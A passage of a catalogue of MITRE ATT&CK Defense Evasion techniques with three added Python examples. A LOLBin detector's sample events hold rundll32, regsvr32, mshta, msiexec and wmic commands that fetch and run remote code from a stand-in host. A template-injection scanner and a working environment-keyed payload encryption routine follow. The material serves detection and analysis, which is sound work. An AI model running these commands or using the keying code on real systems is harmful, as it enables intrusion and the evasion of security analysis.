Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. …
T1054
Defense Evasion: Indicator Blocking
An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft …
T1055
Defense Evasion: Process Injection
Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing …
T1055.001
Defense Evasion: Dynamic-link Library Injection
Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method …
T1055.002
Defense Evasion: Portable Executable Injection
Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method …
T1055.003
Defense Evasion: Thread Execution Hijacking
Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a …
T1055.004
Defense Evasion: Asynchronous Procedure Call
Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate …
T1055.005
Defense Evasion: Thread Local Storage
Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. …
T1055.008
Defense Evasion: Ptrace System Calls
Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. …
T1055.009
Defense Evasion: Proc Memory
Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory …
T1055.011
Defense Evasion: Extra Window Memory Injection
Adversaries may inject malicious code into a process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM …
T1055.012
Defense Evasion: Process Hollowing
Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code …
T1055.013
Defense Evasion: Process Doppelgänging
Adversaries may inject malicious code into a process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is …
T1055.014
Defense Evasion: VDSO Hijacking
Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared …
T1055.015
Defense Evasion: ListPlanting
Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting …
T1064
Defense Evasion: Scripting
**This technique has been deprecated. Please use [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) where appropriate.** Adversaries may use scripts to aid in operations and perform multiple actions …
T1066
Defense Evasion: Indicator Removal from Tools
If a malicious tool is detected and quarantined or otherwise curtailed, an adversary may be able to determine why the malicious tool was detected (the …
T1070
Defense Evasion: Indicator Removal
Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an …
T1070.001
Defense Evasion: Clear Windows Event Logs
Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. …
T1070.002
Defense Evasion: Clear Linux or Mac System Logs
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. …
T1070.003
Defense Evasion: Clear Command History
In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. …
T1070.004
Defense Evasion: File Deletion
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system …
T1070.005
Defense Evasion: Network Share Connection Removal
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin …
T1070.006
Defense Evasion: Timestomp
Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a …
T1070.007
Defense Evasion: Clear Network Connection History and Configurations
Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various …
T1070.008
Defense Evasion: Clear Mailbox Data
Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete …
T1070.009
Defense Evasion: Clear Persistence
Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such …
T1070.010
Defense Evasion: Relocate Malware
Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid …
T1073
Defense Evasion: DLL Side-Loading
Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in …
T1078
Defense Evasion: Valid Accounts
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may …
T1078.001
Defense Evasion: Default Accounts
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts …
T1078.002
Defense Evasion: Domain Accounts
Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: TechNet Credential …
T1078.003
Defense Evasion: Local Accounts
Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts …
T1078.004
Defense Evasion: Cloud Accounts
Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those …
T1085
Defense Evasion: Rundll32
The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid …
T1088
Defense Evasion: Bypass User Account Control
Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. …
T1089
Defense Evasion: Disabling Security Tools
Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event …
T1093
Defense Evasion: Process Hollowing
Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to [Process …
T1096
Defense Evasion: NTFS File Attributes
Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: …
T1099
Defense Evasion: Timestomp
Adversaries may take actions to hide the deployment of new, or modification of existing files to obfuscate their activities. Timestomping is a technique that modifies …
T1107
Defense Evasion: File Deletion
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system …
T1108
Defense Evasion: Redundant Access
**This technique has been deprecated. Please use [Create Account](https://attack.mitre.org/techniques/T1136), [Web Shell](https://attack.mitre.org/techniques/T1505/003), and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.** Adversaries may use more than one remote access …
T1109
Defense Evasion: Component Firmware
Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and …
T1112
Defense Evasion: Modify Registry
Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution. Access to …
T1116
Defense Evasion: Code Signing
Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: …
T1117
Defense Evasion: Regsvr32
Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can …
T1118
Defense Evasion: InstallUtil
InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) …
T1121
Defense Evasion: Regsvcs/Regasm
Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft. (Citation: …
T1122
Defense Evasion: Component Object Model Hijacking
The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) …
T1126
Defense Evasion: Network Share Connection Removal
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [Windows Admin …
T1127
Defense Evasion: Trusted Developer Utilities Proxy Execution
Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that …
T1127.001
Defense Evasion: MSBuild
Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by …
T1127.002
Defense Evasion: ClickOnce
Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a …
T1127.003
Defense Evasion: JamPlus
Adversaries may use `JamPlus` to proxy the execution of a malicious script. `JamPlus` is a build utility tool for code and data build systems. It …
T1130
Defense Evasion: Install Root Certificate
Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application …
T1134
Defense Evasion: Access Token Manipulation
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access …
T1134.001
Defense Evasion: Token Impersonation/Theft
Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token …
T1134.002
Defense Evasion: Create Process with Token
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and …
T1134.003
Defense Evasion: Make and Impersonate Token
Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password …
T1134.004
Defense Evasion: Parent PID Spoofing
Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned …
T1134.005
Defense Evasion: SID-History Injection
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user …
T1140
Defense Evasion: Deobfuscate/Decode Files or Information
Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that …
T1143
Defense Evasion: Hidden Window
Adversaries may implement hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when …
T1144
Defense Evasion: Gatekeeper Bypass
In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called <code>com.apple.quarantine</code>. …
T1146
Defense Evasion: Clear Command History
In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. …
T1147
Defense Evasion: Hidden Users
Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is …
T1148
Defense Evasion: HISTCONTROL
The <code>HISTCONTROL</code> environment variable keeps track of what should be saved by the <code>history</code> command and eventually into the <code>~/.bash_history</code> file when a user logs …
T1149
Defense Evasion: LC_MAIN Hijacking
**This technique has been deprecated and should no longer be used.** As of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that …
T1150
Defense Evasion: Plist Modification
Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded …
T1151
Defense Evasion: Space after Filename
Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app …
T1152
Defense Evasion: Launchctl
Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports …
T1158
Defense Evasion: Hidden Files and Directories
To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t …
T1170
Defense Evasion: Mshta
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension <code>.hta</code>. (Citation: Wikipedia HTML Application) HTAs are standalone applications …
T1181
Defense Evasion: Extra Window Memory Injection
Before creating a window, graphical Windows-based processes must subscribe to or register a Windows class, which stipulates appearance and behavior (via window procedures, which are …
T1186
Defense Evasion: Process Doppelgänging
Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables …
T1191
Defense Evasion: CMSTP
The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe …
T1196
Defense Evasion: Control Panel Items
Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel …
T1197
Defense Evasion: BITS Jobs
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file …
T1198
Defense Evasion: SIP and Trust Provider Hijacking
In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to …
T1202
Defense Evasion: Indirect Command Execution
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be …
T1205
Defense Evasion: Traffic Signaling
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use …
T1205.001
Defense Evasion: Port Knocking
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series …
T1205.002
Defense Evasion: Socket Filters
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can …
T1207
Defense Evasion: Rogue Domain Controller
Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). …
T1211
Defense Evasion: Exploitation for Defense Evasion
Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming …
T1216
Defense Evasion: System Script Proxy Execution
Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from …
T1216.001
Defense Evasion: PubPrn
Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain …
T1216.002
Defense Evasion: SyncAppvPublishingServer
Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands. SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows virtualizes applications (Microsoft Application …
T1218
Defense Evasion: System Binary Proxy Execution
Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are …
T1218.001
Defense Evasion: Compiled HTML File
Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM …
T1218.002
Defense Evasion: Control Panel
Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are …
T1218.003
Defense Evasion: CMSTP
Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection …
T1218.004
Defense Evasion: InstallUtil
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation …
T1218.005
Defense Evasion: Mshta
Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. There are several examples of …
T1218.007
Defense EvasionMsiexec
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with …
T1218.008
Defense EvasionOdbcconf
Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers …
T1218.009
Defense EvasionRegsvcs/Regasm
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are …
T1218.010
Defense EvasionRegsvr32
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, …
T1218.011
Defense EvasionRundll32
Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe instead of executing the code directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)) may avoid triggering security tools that may …
T1218.012
Defense EvasionVerclsid
Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each …
T1218.013
Defense EvasionMavinject
Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into …
T1218.014
Defense EvasionMMC
Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and …
T1218.015
Defense EvasionElectron Applications
Adversaries may abuse components of the Electron framework to execute malicious code. The Electron framework hosts many common applications such as Signal, Slack, and Microsoft …
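Worked detection example for the T1218 family and T1220 above, added here and not part of the ATT&CK text or any vendor's rule set: a small matcher over process-creation telemetry (the fields Sysmon event 1 or Security event 4688 with command-line logging would give you) that flags the rundll32, regsvr32, mshta, msiexec and wmic invocations the entries describe. The events, the `example.invalid` URLs and the rule patterns are constructed for the demo and deliberately narrow; they show the shape of the check, not complete LOLBin coverage.

```python
import re
from typing import Dict, List, Tuple

# (image basename, case-insensitive regex over the command line, technique, reason).
# Illustrative rules only; real coverage needs parent/child context and more patterns.
PROXY_EXEC_RULES: List[Tuple[str, str, str, str]] = [
    ("rundll32.exe", r"javascript:|vbscript:",
     "T1218.011", "rundll32 executing inline script"),
    ("rundll32.exe", r"\\(?:temp|appdata|programdata|public|downloads)\\[^\s,]*\.dll",
     "T1218.011", "rundll32 loading a DLL from a user-writable directory"),
    ("regsvr32.exe", r"/i:\s*\"?https?://|scrobj\.dll",
     "T1218.010", "regsvr32 scriptlet execution (remote /i: target or scrobj.dll)"),
    ("mshta.exe", r"https?://|javascript:|vbscript:|\\(?:temp|appdata)\\",
     "T1218.005", "mshta running a remote, inline or user-writable script"),
    ("msiexec.exe", r"(?:/i|/a|/y|/package|-i)\s+\"?https?://",
     "T1218.007", "msiexec fetching a package from a URL"),
    ("wmic.exe", r"/format:\s*\"?https?://",
     "T1220", "wmic applying a remote XSL stylesheet"),
]
_COMPILED = [(img, re.compile(rx, re.I), tech, why) for img, rx, tech, why in PROXY_EXEC_RULES]


def basename(win_path: str) -> str:
    """Basename of a Windows path, usable on any host (os.path won't split backslashes on Linux)."""
    return win_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, object]) -> List[Tuple[str, str]]:
    """Returns every (technique, reason) pair whose rule matches this one event."""
    image = basename(str(event["image"]))
    cmd = str(event.get("command_line", ""))
    return [(tech, why) for img, rx, tech, why in _COMPILED if img == image and rx.search(cmd)]


def scan(events) -> Dict[int, List[Tuple[str, str]]]:
    """Maps event id -> matches for every event that triggers at least one rule."""
    hits = {}
    for ev in events:
        matches = evaluate(ev)
        if matches:
            hits[ev["id"]] = matches
    return hits


# Constructed process-creation records (not real telemetry). Ids 1 and 6 are benign.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\rundll32.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    {"id": 2, "image": r"C:\Windows\System32\rundll32.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://example.invalid/a.sct")'},
    {"id": 3, "image": r"C:\Windows\System32\regsvr32.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"regsvr32.exe /s /n /u /i:http://example.invalid/p.sct scrobj.dll"},
    {"id": 4, "image": r"C:\Windows\System32\mshta.exe", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": r"mshta.exe http://example.invalid/x.hta"},
    {"id": 5, "image": r"C:\Windows\System32\msiexec.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"msiexec.exe /q /i http://example.invalid/u.msi"},
    {"id": 6, "image": r"C:\Windows\System32\msiexec.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'msiexec.exe /i "C:\Users\alice\Downloads\7z.msi"'},
    {"id": 7, "image": r"C:\Windows\System32\wbem\WMIC.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'wmic.exe os get /format:"http://example.invalid/s.xsl"'},
    {"id": 8, "image": r"C:\Windows\System32\rundll32.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"rundll32.exe C:\Users\Public\upd.dll,Start"},
]

if __name__ == "__main__":
    for event_id, matches in scan(SAMPLE_EVENTS).items():
        print(event_id, matches)
```

The point of the two benign records is that the binaries themselves are never the signal; only their arguments and, in production, their parent process and the origin of the loaded file are. Tune on real telemetry before treating any of these patterns as high fidelity.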
T1220
Defense EvasionXSL Script Processing
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to …
T1221
Defense EvasionTemplate Injection
Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) …
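An added example (not from ATT&CK) of what T1221 changes inside an Office Open XML package and how to look for it: a scanner that walks every `.rels` part in the archive and reports relationships whose `TargetMode="External"` target is a remote location, rating the types Office resolves automatically on open (`attachedTemplate`, `oleObject`, `image`, `subDocument`) above a hyperlink that needs a click. The `build_sample_docx` helper fabricates a minimal archive so the scanner runs offline; it is not a real Word output, and the `example.invalid` target is a placeholder.

```python
import io
import re
import xml.etree.ElementTree as ET
import zipfile
from typing import Dict, List

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Relationship types the application follows on open, without user interaction.
AUTO_FETCH_TYPES = {"attachedTemplate", "oleObject", "image", "subDocument"}
REMOTE_TARGET = re.compile(r"^(?:https?://|file://|\\\\)", re.I)


def scan_ooxml(doc_bytes: bytes) -> List[Dict[str, str]]:
    """Lists external relationships with a remote target across all *.rels parts."""
    findings: List[Dict[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                if not REMOTE_TARGET.match(target):
                    continue
                rel_type = rel.get("Type", "").replace(OFFICE_REL, "")
                findings.append({
                    "part": part,
                    "id": rel.get("Id", ""),
                    "type": rel_type,
                    "target": target,
                    "severity": "high" if rel_type in AUTO_FETCH_TYPES else "low",
                })
    return findings


def build_sample_docx(template_target: str = "") -> bytes:
    """Constructed minimal package. With template_target it carries the external
    attachedTemplate relationship (word/_rels/settings.xml.rels) that template
    injection plants; without it only an ordinary external hyperlink remains."""
    w_ns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    settings_rels = f'<Relationships xmlns="{RELS_NS}">'
    if template_target:
        settings_rels += (f'<Relationship Id="rId1" Type="{OFFICE_REL}attachedTemplate" '
                          f'Target="{template_target}" TargetMode="External"/>')
    settings_rels += "</Relationships>"
    document_rels = (f'<Relationships xmlns="{RELS_NS}">'
                     f'<Relationship Id="rId2" Type="{OFFICE_REL}hyperlink" '
                     'Target="https://example.org/" TargetMode="External"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", f'<w:document xmlns:w="{w_ns}"><w:body/></w:document>')
        zf.writestr("word/settings.xml", f'<w:settings xmlns:w="{w_ns}"/>')
        zf.writestr("word/_rels/document.xml.rels", document_rels)
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_ooxml(build_sample_docx("http://example.invalid/t.dotm")):
        print(finding)
```

Run the scanner on a real `.docx` or `.dotx` by passing the file's bytes; the relationship file names and the `TargetMode` attribute are the same in any OOXML package, and a `file://` or UNC target is worth the same attention as an HTTP one because it can force the outbound authentication the entry mentions.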
T1222
Defense EvasionFile and Directory Permissions Modification
Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 …
T1222.001
Defense EvasionWindows File and Directory Permissions Modification
Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 …
T1222.002
Defense EvasionLinux and Mac File and Directory Permissions Modification
Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 …
T1223
Defense EvasionCompiled HTML File
Compiled HTML files (.chm) are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as …
T1480
Defense EvasionExecution Guardrails
Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on …
T1480.001
Defense EvasionEnvironmental Keying
Adversaries may environmentally key payloads or other features of malware to evade defenses and constrain execution to a specific target environment. Environmental keying uses cryptography …
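An added illustration of the mechanism behind T1480.001, written for this page rather than taken from ATT&CK or any malware family: the payload is sealed under a key derived from values only the intended host has (hostname, domain, a machine identifier), so a sandbox or an analyst without those values gets an authentication failure rather than plaintext. The hostname, domain and machine id are made up, and the cipher is an HMAC-SHA256 counter keystream plus an HMAC tag so that the block runs on the standard library; a real sample would use AES-GCM or similar, but the keying logic is the same.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

SALT_LEN = 16
NONCE_LEN = 16
TAG_LEN = 32
PBKDF2_ROUNDS = 100_000  # makes guessing candidate environment values expensive


def environment_fingerprint(hostname: str, domain: str, machine_id: str) -> bytes:
    """Canonical bytes built from values the payload expects to find on the target."""
    return "|".join(v.strip().lower() for v in (hostname, domain, machine_id)).encode()


def derive_keys(fingerprint: bytes, salt: bytes) -> Tuple[bytes, bytes]:
    material = hashlib.pbkdf2_hmac("sha256", fingerprint, salt, PBKDF2_ROUNDS, dklen=64)
    return material[:32], material[32:]  # (encryption key, MAC key)


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream from HMAC-SHA256 (stand-in for a block cipher)."""
    out = bytearray()
    block = 0
    while len(out) < length:
        out += hmac.new(key, nonce + block.to_bytes(4, "big"), hashlib.sha256).digest()
        block += 1
    return bytes(out[:length])


def seal(payload: bytes, fingerprint: bytes) -> bytes:
    """Done by the operator before delivery: salt | nonce | ciphertext | tag."""
    salt, nonce = os.urandom(SALT_LEN), os.urandom(NONCE_LEN)
    enc_key, mac_key = derive_keys(fingerprint, salt)
    ct = bytes(p ^ k for p, k in zip(payload, _keystream(enc_key, nonce, len(payload))))
    tag = hmac.new(mac_key, salt + nonce + ct, hashlib.sha256).digest()
    return salt + nonce + ct + tag


def unseal(blob: bytes, fingerprint: bytes) -> Optional[bytes]:
    """Done on the host at run time; returns None when the environment is wrong."""
    if len(blob) < SALT_LEN + NONCE_LEN + TAG_LEN:
        return None
    salt, nonce = blob[:SALT_LEN], blob[SALT_LEN:SALT_LEN + NONCE_LEN]
    ct, tag = blob[SALT_LEN + NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    enc_key, mac_key = derive_keys(fingerprint, salt)
    expected = hmac.new(mac_key, salt + nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return bytes(c ^ k for c, k in zip(ct, _keystream(enc_key, nonce, len(ct))))


if __name__ == "__main__":
    target = environment_fingerprint("FIN-WS-042", "corp.example", "4c4c4544-0032")
    sandbox = environment_fingerprint("SANDBOX-01", "corp.example", "4c4c4544-0032")
    blob = seal(b"stage2: whoami && hostname", target)
    print("on target :", unseal(blob, target))
    print("in sandbox:", unseal(blob, sandbox))
```

For the analyst the consequence is that the sample cannot be detonated generically: the environment values have to be recovered from the victim host (or brute-forced against the PBKDF2 cost) before the second stage can be decrypted, which is why memory captures from the actual infected machine are so valuable in these cases.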
T1480.002
Defense EvasionMutual Exclusion
Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize …
T1484
Defense EvasionDomain or Tenant Policy Modification
Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. Such services provide …
T1484.001
Defense EvasionGroup Policy Modification
Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on …
T1484.002
Defense EvasionTrust Modification
Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants …
T1497
Defense EvasionVirtualization/Sandbox Evasion
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for …
T1497.001
Defense EvasionSystem Checks
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks …
T1497.002
Defense EvasionUser Activity Based Checks
Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of …
T1497.003
Defense EvasionTime Based Checks
Adversaries may employ various time-based methods to detect virtualization and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of …
T1500
Defense EvasionCompile After Delivery
Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), …
T1502
Defense EvasionParent PID Spoofing
Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned …
T1506
Defense EvasionWeb Session Cookie
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already …
T1527
Defense EvasionApplication Access Token
Adversaries may use application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are …
T1535
Defense EvasionUnused/Unsupported Cloud Regions
Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage …
T1536
Defense EvasionRevert Cloud Instance
